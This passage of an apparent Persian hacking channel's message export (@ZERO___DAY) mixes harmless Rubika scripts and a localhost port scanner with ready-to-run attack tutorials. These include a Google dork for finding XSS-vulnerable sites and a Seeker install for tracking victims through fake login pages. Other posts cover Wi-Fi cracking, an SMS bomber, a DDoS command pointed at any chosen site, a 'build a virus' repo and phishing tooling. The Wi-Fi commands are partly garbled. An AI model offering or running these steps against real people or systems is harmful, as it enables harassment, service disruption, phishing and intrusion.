چیست؟\n\nدر معرفی سیستم عامل لینوکس می توان گفت سیستم عامل لینوکس از قدرتمندترین سیستم عامل‌های موجود در بازار است که بصورت‌ متن باز ارائه می گردد. همچنین در بین مهندسان نرم‌افزار از محبوبیت ویژه‌ای برخوردار است.\n\nبرای آشنایی با سیستم عامل لینوکس باید بدانید که سیستم عامل unix ( یونیکس ) در سال ۱۹۷۱ توسط شرکت تلفن و تلگراف آمریکا توسعه و گسترش پیدا کرد. این سیستم عامل گران قیمت بود و همه مردم نمی‌توانستند به راحتی از آن استفاده کنند.\n\nبنابراین سیستم لینوکس که بسیار شبیه به یونیکس و از زیر شاخه‌های آن است، به عنوان جانشین برگزیده شد. در سال ۱۹۹۱ تورالدز لینوکس هسته مرکزی لینوکس را ساخت. سیستم عامل لینوکس توسط کمپانی‌های بسیاری پشتیبانی می‌شود.\n#Lxpart4\n\n\n@ZERO___DAY","time":"1777191639","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":27,"length":651,"type":"Quote"}]},"allow_transcription":false,"share_link":"BGGEBFHJCEGJHBFF"},{"message_id":"1662512135125155","text":"*مهارت های کافی برای هکر شدن*\n\nمرحله اول آشنایی با مفاهیم اولیه.\n\nNetwork Plus\nCEH\nمرحله دوم آشنایی با خط فرمان های سیستم عامل ها.\n\nLinux Commands\nWindows Commands\nLPIC 1 & 2\nمرحله سوم آشنایی با فریمورک های نفوذ و پنتست.\n\nMetasploit Basic\nMetasploit Advanced\nمرحله چهارم آشنایی با آسیب پذیری های تحت وب.\n\nBasic of Web Penetration Testing\nAdvanced of Web Penetration Testing\nPenetration Testing with Kali\nSQL Programming & PHP/ASP Syntax\nEntitty framework & .Net Core\nمرحله پنجم طریقه جمع آوری اطلاعات از سطح اینترنت.\n\nInfoGathering & OSINT\nGoogle Hacking & Web Mapping\nSocial Engeenering & Man Spoofing\nمرحله ششم کرک اکانت و جمع آوری اکانت.\n\nAccount Leech & Cracking\nمرحله هفتم آشنایی با رمزنگاری ها و تست ضعف رمزنگاری.\n\nCryptography Pentesting\nمرحله هشتم تکنیک های نفوذ به شبکه های زیرساختی و بیسیم.\n\nNetwork & Wireless Hacking\nمرحله نهم تکنیک های نفوذ و دور زدن مکانیزم های برنامه های کاربردی.\n\nAndroid & iOS Penetration Testing\nمرحله دهم تست نفوذ با زبان پایتون.\n\nPython for Penetration Testing\nمرحله یازدهم آشنایی یا زبان پاورشل و پتانسیل آن.\n\nPowershell for Penetration Testing\nمرحله دوازدهم تکنیک های مبهم سازی ر برنامه نویسی و رمزنگاری.\n\nObfuscation Methods\nEncryption & Packers\nمرحله سیزدهم تکنیک های ارتقاء سطح دسترسی.\n\nPrivilage Ecalation\nمرحله چهاردهم تکنیک های نگهداری دسترسی و بکدور.\n\nPersistence Methods\nمرحله پانزدهم تکنیک های ضد ردیابی دسترسی.\n\nAnti Forensic Methods\nمرحله شانزدهم برنامه نویسی زبان C و سوکت نویسی.\n\nC & Network Programming\nمرحله هفدهم برنامه نویسی زبان روبی و جاوا اسکریپت.\n\nRuby & JavaScript Programming\nمرحله هجدهم برنامه نویسی .VBScript & ActionScript\n\nActionScript & VBScript Programming\nمرحله نوزدهم برنامه نویسی زبان ماشین.\n\nAssembly Programming\nمرحله بیستم آشنایی با ساختار فایل فرمت ها و ماژول های کرنل.\n\nOperating System File Format\nWinAPI & LinAPI Syntax\nمرحله بیست و یکم برنامه نویسی .COM & DCOM\n\nCOM and DCOM Programming\nمرحله بیست و دوم تحلیل ساختار فایروال های نرم افزاری و سخت افزاری.\n\nHardware & Software Firewall Analysis\nمرحله بیست و سوم مهندسی معکوس هر برنامه ای و تکنیکی.\n\nAdvanced Reverse Engineering\nمرحله بیست و چهارم اکسپلویت نویسی و دور زدن مکانیزم های دفاعی.\n\nAdvanced Exploit Development\nمرحله بیست و پنجم ساختن بکدورهای روت کیت و بوت کیت.\n\nBootkit & Rootkit Analysis\nمرحله بیست و ششم اکسپلویت نویسی سیستم عامل های گوشی ها.\n\nAndroid & iOS Exploit Development\nمرحله بیست و هفتم تکنیک های حملات به ماهواره ها و شنود آنها.\n\n\n@ZERO____DAY","time":"1777141559","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":31,"length":2348,"type":"Quote"}]},"allow_transcription":false,"share_link":"BGGCFBCBDFBCFBFF"},{"message_id":"1662463106738155","text":"#هک سایت\n🔰اموزش هک سایت با باگ های rfu, poto , xss🔰\n\n 🔰باگ xss 👇🏿\n\n1⃣وارد گوگل شید و دورک زیر رو سرچ میکنین👇🏿\n\n inurl:\"/showcatrows.php?CategoryID=\" \n\n2⃣ وقتی که این دورک رو تو گوگل سرچ کردید, تارگت هایی با باگه xss میاره که شما رو یکیشون کلیک میکنین و به اخره سایت اینو اضافه میکنین👇🏿\n\n\">

power

15:\n print(\"❌ ERROR: Phone number is too long (max 15 digits)\")\n return None\n \n return phone\n\nwhile True:\n while True:\n raw_number = input(\"\\n📱 Enter phone number (with country code, e.g., 989123456789): \").strip()\n\n phone_number = validate_phone(raw_number)\n \n if not phone_number:\n print(\"🔄 Please try again...\")\n continue\n\n print(f\"\\n📱 Number entered: {phone_number}\")\n confirm = input(\"✅ Is this number correct? (y/n): \").strip().lower()\n \n if confirm == 'y':\n break\n else:\n print(\"🔄 Please enter the number again...\")\n continue\n\n print(\"\\n🔄 Sending verification code...\")\n \n try:\n result = Network(Methods(None, \"android\", 6, None, 2, None)).request(\n method=\"sendCode\",\n input={\n \"phone_number\": phone_number,\n \"pass_key\": None,\n \"send_type\": \"SMS\",\n },\n tmpSession=True\n )\n status = result.get('status', '')\n \n if status == 'SendPassKey':\n \n while True:\n passkey = input(\"\\n🔐 Enter 2-step verification password: \").strip()\n if passkey == \"\":\n print(\"❌ Password cannot be empty!\")\n continue\n \n print(\"\\n🔄 Sending verification code with password...\")\n \n try:\n result = Network(Methods(None, \"android\", 6, None, 2, None)).request(\n method=\"sendCode\",\n input={\n \"phone_number\": phone_number,\n \"pass_key\": passkey,\n \"send_type\": \"SMS\",\n },\n tmpSession=True\n )\n \n status = result.get('status', '')\n \n if status == 'InvalidPassKey':\n print(\"\\n❌ Incorrect password!\")\n continue\n elif status == 'OK':\n print(\"\\n✅ SUCCESS: Verification code sent!\")\n print(\"📱 Check your phone for the verification code.\")\n print(f\"\\n📊 Response: \\n{result}\")\n break\n else:\n print(f\"\\n📊 Response: {result}\")\n break\n\n except Exception as e:\n print(f\"\\n❌ ERROR: {e}\")\n break\n\n elif status == 'OK':\n print(\"\\n✅ SUCCESS: Verification code sent!\")\n print(\"📱 Check your phone for the verification code.\")\n print(f\"\\n📊 Response: \\n{result}\")\n else:\n print(f\"\\n📊 Response: \\n{result}\")\n\n except Exception as e:\n print(f\"\\n❌ ERROR: {e}\")\n\n another = input(\"\\n🔄 Try another number? (y/n): \").lower()\n if another != 'y':\n print(\"\\n👋 Goodbye!\")\n break\n\nپیش‌نیاز:\npip install pyrubi\n\nتوضیحات:\nبا این کد می توانید کد تأیید را در اعلانات ورود بفرستید. کافی‌ست کد را اجرا کرده و در کنسول شماره و تایید دومرحله‌ایِ اکانت خود را وارد نمایید.\n\n\n@ZERO____DAY","time":"1777048949","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":36,"length":3882,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BGFJADIEFHGGABFF"},{"message_id":"1656494190736155","text":"🎯 کاربردهای اصلی Seeker:\n\n\n. جمع‌آوری اطلاعات موقعیت مکانی (Location Tracking)\n\n· دریافت مختصات GPS دقیق\n· شناسایی موقعیت جغرافیایی قربانی\n· نمایش روی نقشه\n\n۲. جمع‌آوری اطلاعات دستگاه (Device Information)\n· سیستم عامل و نسخه مرورگر\n· رزولوشن صفحه نمایش\n· مدل دستگاه\n· زبان سیستم\n\n۳. شبیه‌سازی صفحات لاگین معروف\n· صفحات جعلی شبیه به:\n · تلگرام\n · اینستاگرام\n · فیسبوک\n · گیت‌هاب\n · و سایر پلتفرم‌ها\n\n۴. تست آگاهی امنیتی\n· آموزش به کاربران برای شناسایی صفحات فیشینگ\n· تست حساسیت کارمندان در سازمان‌ها\n\n⚠️ هشدارهای اخلاقی و قانونی:\n· فقط برای اهداف آموزشی استفاده شود\n· هرگز بدون مجوز روی دیگران استفاده نکنید\n· استفاده غیرقانونی جرم محسوب می‌شود\n· فقط روی دستگاه‌های خودتان یا با اجازه کتبی تست کنید\n\n🛡️ کاربرد حرفه‌ای:\n· تست نفوذ سازمانی (Penetration Testing)\n· ارزیابی امنیتی سامانه‌ها\n· آموزش امنیت به پرسنل\n· تحقیقات امنیتی\ngit clone https://github.com/thewhiteh4t/seeker.git\ncd seeker/\nchmod +x install.sh\n./install.sh\nو در آخر برای اجرا :\npython seeker.py\n\n\n@ZERO____DAY","time":"1776970370","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":28,"length":938,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BGFGEJEBJAHDGBFF"},{"message_id":"1656361118965155","text":"کد پروفایل دوگانه یا همان باگ پروفایل:\n\nfrom rubpy import Client\n\nSESSION_NAME = \"mySession\"\n\nTARGET = \"me\" # اگر می‌خواهید برای کانال / گروه پروفایل بگذارید، به جای me گوید موردنظر را وارد کنید.\n\nAB = \"IMG_20260318_134002_738.jpg\" # عکسی که می‌خواهید از دور نمایش داده شود\n\nCD = \"IMG_20260317_185440_871.jpg\" # عکسی که می‌خواهید از نزدیک نمایش داده شود\ntry:\n with Client(SESSION_NAME) as client:\n up = client.upload(AB)\n tumb = up.file_id\n result = client.upload_avatar(TARGET, CD, tumb)\n print(\"عملیات با موفقیت انجام شد.\\n\", result)\n\nexcept Exception as e:\n if \"INVALID_AUTH\" in str(e):\n print(\"خطا در اجرای عملیات، ربات دسترسی به گروه / کانال مورد نظر را ندارد.\")\n elif \"INVALID_INPUT\" in str(e):\n print(\"خطا در اجرای عملیات، ورودی یا گوید وارد شده نامعتبر است.\")\n elif \"File not found\" in str(e):\n print(\"خطا در اجرای عملیات، فایل‌های تصویری مشخص شده یافت نشدند. لطفاً از قرار داشتن تصاویر در کنار کد و صحت نام آن‌ها اطمینان حاصل فرمایید.\")\n else:\n print(\"خطا در اجرای عملیات:\", e)\n\nپیش نیاز:\npip install rubpy\n\nروش نصبِ کتابخانه در شرایط فعلی:\npip install -i https://mirror-pypi.runflare.com/simple rubpy\n\nتوضیحات:\n۱. در بخش SESSION_NAME ، نام سشن مربوط به حساب کاربری خود را وارد کنید و سشن را کنار کد قرار دهید. (سشن های کتابخانه‌ی rubpy با پسوند rp. هستند.)\nچنانچه تاکنون سشنی ایجاد نکرده‌اید، در قسمت SESSION_NAME تغییری ایجاد نکنید تا سشن حساب شما ساخته شود.\n\n۲.  در بخش TARGET، گوید (GUID) مربوط به کانال یا گروه موردنظر را وارد کنید؛ اگر می‌خواهید برای اکانت خود پروفایل تنظیم کنید، در قسمت TARGET تغییری ایجاد نکنید.\nبرای به دست آوردنِ GUID گروه یا کانال خود، می‌توانید از این فیلم کمک بگیرید.\n\n۳. دو عکس مورد نظر خود را کنار کد قرار داده و بر اساس کامند ها، نام دو عکسِ مورد نظر را در قسمت های AB و CD وارد کنید.\n\nپس از اجرای کد، پروفایل مورد نظر به صورت دوگانه تنظیم خواهد شد.\n\nنکته کلیدی:\nحساب کاربری شما باید از مدیران کانال یا گروهِ هدف باشد و دسترسیِ تغییر اطلاعات را برای تنظیم پروفایل، دارا باشد.\n\n\n@ZERO____DAY","time":"1776967430","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":40,"length":1960,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BGFGDGBBBIJGFBFF"},{"message_id":"1656359118295155","text":"کد پاکسازی پیام‌های گروه:\n\nfrom rubpy import Client\nimport asyncio\n\nSESSION_NAME = \"clear_Group\"\nGROUP_GUID = \"\"\n\nasync def main():\n async with Client(SESSION_NAME) as app:\n creation_id = None\n try:\n resp = await app.get_messages_interval(GROUP_GUID, \"0\")\n for msg in resp.messages or []:\n update = getattr(msg, \"original_update\", {})\n if update.get(\"type\") == \"Event\" and update.get(\"event_data\", {}).get(\"type\") == \"GroupCreated\":\n creation_id = msg.message_id\n print(f\"پیام «گروه ایجاد شد.» پیدا شد: {creation_id}\")\n break\n except:\n pass\n\n if not creation_id:\n if input(\"پیام «گروه ایجاد شد» پیدا نشد، ادامه می‌دهید؟ (y/N): \").strip().lower() != \"y\":\n return\n\n print(\"شروع پاکسازی کامل گروه از آخر به اول...\\n\")\n deleted = 0\n mid = \"9999999999999999\"\n\n while True:\n try:\n resp = await app.get_messages_interval(GROUP_GUID, mid)\n messages = resp.messages or []\n if not messages:\n break\n except:\n break\n\n batch = []\n for msg in messages:\n if str(msg.message_id) == str(creation_id):\n continue\n update = getattr(msg, \"original_update\", {})\n if update.get(\"type\") == \"Event\" and update.get(\"event_data\", {}).get(\"type\") == \"GroupCreated\":\n continue\n batch.append(msg.message_id)\n\n for i in range(0, len(batch), 25):\n try:\n await app.delete_messages(GROUP_GUID, batch[i:i+25])\n count = len(batch[i:i+25])\n deleted += count\n print(f\"حذف شد: {count} پیام | مجموع: {deleted}\")\n await asyncio.sleep(1.3)\n except Exception as e:\n if \"INVALID_AUTH\" in str(e) or \"ERROR_GENERIC\" in str(e):\n print(\"\"\"در اجرای عملیات مشکلی پیش آمده است که ممکن است به دلایل زیر باشد:\n۱. شناسه (GUID) گروه نامعتبر است.\n۲. اکانت ادمین گروه نیست.\n۳. اکانت ادمین است اما دسترسی «حذف پیام همه اعضا» را ندارد.\"\"\")\n return\n\n if messages:\n mid = messages[-1].message_id\n\n if any(str(m.message_id) == str(creation_id) for m in messages):\n break\n await asyncio.sleep(0.5)\n\n print(f\"پاکسازی گروه با موفقیت انجام شد.\")\n print(f\"تعداد پیام حذف شده: {deleted}\") \n\nasyncio.run(main())\n\nپیش نیاز:\npip install rubpy\n\nتوضیحات:\n۱. در بخش SESSION_NAME ، نام سشن مربوط به حساب کاربری خود را وارد کنید و سشن را کنار کد قرار دهید. (سشن های کتابخانه‌ی rubpy با پسوند rp. هستند.)\nچنانچه تاکنون سشنی ایجاد نکرده‌اید، در قسمت SESSION_NAME تغییری ایجاد نکنید تا سشن حساب شما ساخته شود.\n\n۲. در بخش GROUP_GUID ، شناسه (GUID) گروه هدف را وارد کنید.\nشناسه (GUID) های گروه معمولاً با پیشوند (g0) آغاز می‌شوند. نمونه‌ای معتبر از این قالب به شکل زیر است:\ng0GaJzm0e69791b92ba65303d9798df0\nبرای به‌دست آوردن GUID کانال خود، می‌توانید از این فیلم کمک بگیرید.\n\nپس از اجرای کد، همه‌ی پیام های گروه به جز پیام \"گروه ایجاد شد.\" حذف می‌شود و گروه پاکسازی می‌گردد. مزیت این کد این است که به عنوان مثال اگر شما گروهی را خریداری کرده باشید و قصد پاکسازی آن را دارید، می‌توانید با این کد گروه خود را پاکسازی و خام کنید؛ زمان اتمام پاکسازی گروه به تعداد پیام های گروه بستگی دارد.\n\nنکات کلیدی:\n۱. حساب کاربری شما باید از مدیران گروهِ هدف باشد و دسترسیِ حذف پیام را برای پاکسازی گروه، دارا باشد.\n۲. از این کد نمی‌توان برای پاکسازی کانال استفاده کرد، برای پاکسازی کانال خود، از این کد استفاده نمایید.\n\n\n@ZERO____DAY","time":"1776967397","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":27,"length":3700,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BGFGDFJBBICJFBFF"},{"message_id":"1608839020776155","text":"💻اموزش هک وای فای💻\n\n1-کارت شبکه خود را به سیستم وصل کنید.\n2-وارد کالی لینوکس شوید \n3-یک ترمینال باز کنید\n4-توش دستورات زیر را بنویسید👇\nsudo apt install airmon-ng\nبعدش👇\nairdump-ng wlan0\nبعدش مک و ادرس ایپی اون ایپی رو کپی کنید👇\naircrack-ng wlan0\nبعدش اون مک و ادرس ایپی رو اونجا وارد میکنیم و شروع میکنه به کرک کردن پسورد💥\nحداقل ۱۰تا ۱۵ دقیقه طول میکشه بستگی به قوی بودن پسورد داره✅\n\n\n@ZERO____DAY","time":"1775561007","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":2,"length":16,"type":"Bold"},{"from_index":2,"length":16,"type":"Underline"},{"from_index":22,"length":365,"type":"Quote"}]},"allow_transcription":false,"share_link":"BGAIIDJACAHHGBFF"},{"message_id":"1603015185330155","text":"💻حالا که با هک اخلاقی اشنا شدین بریم یکم با دیدگاه حرفه‌ای تر بهش نگاه کنیم:💻\n\nفرآیند هک اخلاقی یه رویکرد سیستماتیک و چند مرحله‌ای داره که معمولا شامل این مرحله‌ها هست:\n\n۱. شناسایی (Reconnaissance):\n\nاین مرحله، اولین قدم توی حمله هست. اینجا، هدف جمع‌آوری اطلاعات ممکن درباره هدف هست. این اطلاعات میتونن شامل این موارد باشن:\n\nاطلاعات فعال (Active Reconnaissance): اسکن پورت‌ها (Port Scanning) برای شناسایی سرویس‌های در حال اجرا، نقشه‌برداری شبکه (Network Mapping)، شناسایی سیستم‌عامل‌ها (OS Fingerprinting) و نرم‌افزارهای مورد استفاده. ابزارهایی مثل Nmap، Nessus و OpenVAS توی این مرحله خیلی کاربردی هستن.\n\nاطلاعات غیرفعال (Passive Reconnaissance): جمع‌آوری اطلاعات از منابع عمومی مثل وب‌سایت شرکت، پروفایل‌های شبکه‌های اجتماعی کارکنان، WHOIS records، و استفاده از موتورهای جستجو (مثل Google Dorking) برای پیدا کردن اطلاعات حساس که به اشتباه منتشر شده.\n\n۲. اسکن (Scanning):\n\nبعد از جمع‌آوری اطلاعات اولیه، مرحله اسکن برای شناسایی دقیق‌تر آسیب‌پذیری‌ها شروع میشه. این شامل:\n\nاسکن آسیب‌پذیری (Vulnerability Scanning): استفاده از ابزارهای خودکار برای شناسایی حفره‌های امنیتی شناخته شده توی سیستم‌ها، برنامه‌ها و پیکربندی‌ها.\nاسکن شبکه (Network Scanning): شناسایی دستگاه‌های فعال توی شبکه، پورت‌های باز و سرویس‌های در حال اجرا.\n\n۳. دستیابی به سیستم (Gaining Access):\n\nاین مرحله قلب فرآینده، جایی که هکر تلاش میکنه با سوءاستفاده از \nآسیب‌پذیری‌های کشف شده، به سیستم هدف نفوذ کنه. معمولا از روش‌های زیر استفاده میشه:\n\nاستفاده از آسیب‌پذیری‌های نرم‌افزاری: استفاده از باگ‌ها و ضعف‌های امنیتی توی برنامه‌های کاربردی، سیستم‌عامل‌ها، یا سرویس‌های شبکه (مثل SQL Injection, Cross-Site Scripting (XSS), Buffer Overflows). ابزارهایی مثل Metasploit Framework ابزارهای قدرتمندی برای این کار فراهم می‌کنن.\n\nمهندسی اجتماعی (Social Engineering): فریب دادن کاربران برای افشای اطلاعات حساس (مثل رمز عبور) از طریق ایمیل‌های فیشینگ (Phishing)، تماس‌های تلفنی جعلی، یا حتی حضوری.\n\nحملات Brute Force و Dictionary Attacks: حدس زدن رمزهای عبور از طریق امتحان کردن تعداد زیادی رمز احتمالی.\n\n۴. حفظ دسترسی (Maintaining Access):\n\nبعد از نفوذ موفقیت‌آمیز، هکر اخلاقی تلاش می‌کنه دسترسی خودشو حفظ کنه تا بتونه کارهای بیشتری انجام بده یا در آینده دوباره دسترسی پیدا کنه. این میتونه شامل نصب بدافزار (Malware) مثل روت‌کیت (Rootkit) یا ایجاد درب‌های پشتی (Backdoors) باشه.\n\n۵. پاکسازی ردپا (Covering Tracks):\n\nتوی یه حمله مخرب، هکر تلاش می‌کنه هیچ اثری از خودش به جا نزاره. اما توی هک اخلاقی، این مرحله بیشتر به معنی مستندسازی دقیق هست. هکر اخلاقی باید همه اقداماتش، آسیب‌پذیری‌های کشف شده، نحوه دستیابی به اونا و شواهدی که جمع‌آوری کرده رو به طور کامل ثبت کنه تا بتونه گزارشی جامع به کارفرما ارائه بده. البته، بعضی از تکنیک‌های پاکسازی ردپا (مانند حذف لاگ‌ها) در این مرحله برای شبیه‌سازی حملات واقعی ممکن است انجام شوند، اما هدف اصلی همچنان مستندسازی است.\n\n۶. گزارش‌دهی (Reporting):\n\nاین مهم‌ترین بخش برای کارفرماعه. گزارش نهایی باید شامل این چیزا باشه:\n\nخلاصه‌ای مدیریتی (Executive Summary) از وضعیت کلی امنیتی.\nشرح دقیق آسیب‌پذیری‌های کشف شده، همراه با شدت (Severity) و ریسک (Risk) هرکدوم.\nمراحل دقیق طی شده برای کشف و بهره‌برداری از هر آسیب‌پذیری (شامل ابزارها و تکنیک‌های استفاده شده).\nشواهد (Proof of Concept) برای هر آسیب‌پذیری.\nتوصیه‌های مشخص و عملی برای رفع هر آسیب‌پذیری، اولویت‌بندی شده بر اساس ریسک.\n\n\n@ZERO____DAY","time":"1775383145","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":2,"length":77,"type":"Bold"},{"from_index":2,"length":77,"type":"Underline"},{"from_index":79,"length":1,"type":"Underline"},{"from_index":81,"length":3096,"type":"Quote"}]},"allow_transcription":false,"share_link":"BGADABFBIFDDABFF"},{"message_id":"1602990171090155","text":"🛡اسکن ساده پورت روی شبکه خودت:🛡\nimport socket\n\ntarget = \"127.0.0.1\"\nports = [21, 22, 80, 443]\n\nfor port in ports:\n    s = socket.socket()\n    s.settimeout(0.5)\n    result = s.connect_ex((target, port))\n    if result == 0:\n        print(f\"Port {port} open\")\n    else:\n        print(f\"Port {port} closed\")\n    s.close()\n\n@ZERO____DAY","time":"1775382408","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":2,"length":29,"type":"Bold"},{"from_index":2,"length":29,"type":"Underline"},{"from_index":34,"length":285,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BGACJJABHBAJABFF"},{"message_id":"1598007759175155","text":"🔹🔹sms با ترموکس🔹🔹\n\n> apt update && apt upgrade\n\n> pkg install git python -y\n\n> pkg install python2 -y \n\n> pkg install python3 -y\n\n> cd  /sdcard/Download\n\n> unzip ni_bomber.zip\n\n> cd ni_bomber\n\n> pip3 install -r requirements.txt\n\n> chmod +x *\n\n> python3 ni_bomber.py\n\n \nبا این کد میتونید sms رگباری برای اون شماره مورد نظر ارسال کن.\n\n\n@ZERO____DAY","time":"1775216149","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":4,"length":4,"type":"Bold"},{"from_index":4,"length":4,"type":"Underline"},{"from_index":8,"length":9,"type":"Bold"},{"from_index":8,"length":9,"type":"Underline"},{"from_index":23,"length":313,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BFJIAAHHFJBHFBFF"},{"message_id":"1595499531758155","text":"آموزش هک - جلسه : هر چیزی یک آدرس دارد (مفهوم IP) 🌐\n\nسلام رفقای عزیز! خوشحالم که تصمیم گرفتید وارد دنیای جذاب امنیت سایبری بشید. مثل هر مهارتی، هک کردن هم پایه و اساس دارد و بدون فهمیدن آنها، هیچ‌وقت نمی‌تونید هکر بشید.\n\nاولین و مهم‌ترین چیزی که باید یاد بگیرید، IP Address یا همان آدرس پروتکل اینترنت است.\n\n IP چیست؟\nتصور کنید می‌خواهید نامه‌ای به دوستتان بفرستید. برای اینکه نامه به دست او برسد، باید آدرس دقیق خانه‌اش را روی پاکت بنویسید، درست است؟\nدر دنیای اینترنت هم، هر دستگاهی (مثل گوشی، لپ‌تاپ یا سرور) که به اینترنت وصل می‌شود، یک آدرس منحصر‌به‌فرد دارد که به آن می‌گوییم IP.\n\n🔢 شکل ظاهری IP:\nیک آدرس IP معمولاً یک سری عدد است که با نقطه از هم جدا شده‌اند. مثلاً:\n192.168.1.1\n\n🎯 چرا IP برای هکر مهم است؟\nیک هکر برای اینکه بتواند به یک سیستم حمله کند، اول باید IP آن سیستم را پیدا کند. بدون دانستن IP، شما نمی‌دانید به \"خانه\" کی در اینترنت در می‌زنید!\n\n✅ خلاصه :\n۱. هر دستگاه متصل به اینترنت یک IP دارد.\n۲. IP مثل آدرس خانه است.\n۳. برای حمله یا تست نفوذ، اول باید IP هدف را پیدا کنیم.\n\n💡 تمرین:\nسعی کنید IP گوشی یا کامپیوتر خودتان را پیدا کنید. (می‌توانید در گوگل عبارت \"What is my IP\" را جستجو کنید).\n\n\n@ZERO____DAY","time":"1775099942","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":0,"length":52,"type":"Bold"},{"from_index":0,"length":52,"type":"Underline"},{"from_index":54,"length":1059,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BFJFEJJFDBHFIBFF"},{"message_id":"1595495529447155","text":"💻دیداس به سایت💻\n\napt update \n\napt upgrade\n\npkg install git -y\n\npkg install python\n\npkg install python2\n\npkg install python3\n\ngit clone https://github.com/cyweb/hammer\n\ncd hammer\n\npython3 hammer.py -s (IP)\n\n🔹به جای (IP) باید ایپی سایت مورد نظر خودتونو بزاری.مثال:↙️\n\npython3 hammer.py -s 10.30.170.12\n\n🔹برای گرفتن ایپی سایت مورد نظر از کد زیر استفاده کنید↙️\nping (آدرس سایت)\nمثال :↙️\nping google.com\n\n\n@ZERO____DAY","time":"1775098400","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":2,"length":13,"type":"Bold"},{"from_index":2,"length":13,"type":"Underline"},{"from_index":19,"length":383,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BFJFEJFFCJEEHBFF"},{"message_id":"1595494529027155","text":"💻ساخت ویروس💻\n\n>apt upgrade\n\n>apt upgrade\n\n>pkg install git -y\n\n>pkg install python -y\n\n>pkg install python2 -y\n\n>apt-get install git\n\n>git clone https://github.com/d3L3t3dOn3/Malicious\n\n>cd Malicious\n\n>unzip Malicious.zip\n\n>cd Malicious\n\n>chmod +x * \n\n>pip2 install -r requirements.txt\n\n>python2 malicious.py\n\n@ZERO____DAY","time":"1775098131","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":2,"length":10,"type":"Bold"},{"from_index":2,"length":10,"type":"Underline"},{"from_index":16,"length":294,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BFJFEJEFCJACHBFF"},{"message_id":"1595494528817155","text":"💻تست نفوذ با ترموکس💻\n\npkg update && pkg upgrade\n\npkg install git\n\npkg install curl\n\npkg install python\n\npkg install unstable-repo\n\npkg install metasploit\n\npkg install nmap\n\npkg install wireshark\n\npkg install aircrack-ng\n\npkg install hydra\n\npkg install git\ngit clone https://github.com/sundowndev/Phishing-Frenzy.git\n\ncd Phishing-Frenzy\n\npip install -r requirements.txt\n\npkg install sqlmap\n\n\n@ZERO____DAY","time":"1775098022","is_edited":true,"type":"Text","metadata":{"meta_data_parts":[{"from_index":2,"length":18,"type":"Bold"},{"from_index":2,"length":18,"type":"Underline"},{"from_index":24,"length":366,"type":"Quote"}]},"allow_transcription":false,"has_link":true,"share_link":"BFJFEJEFCIIBHBFF"}]};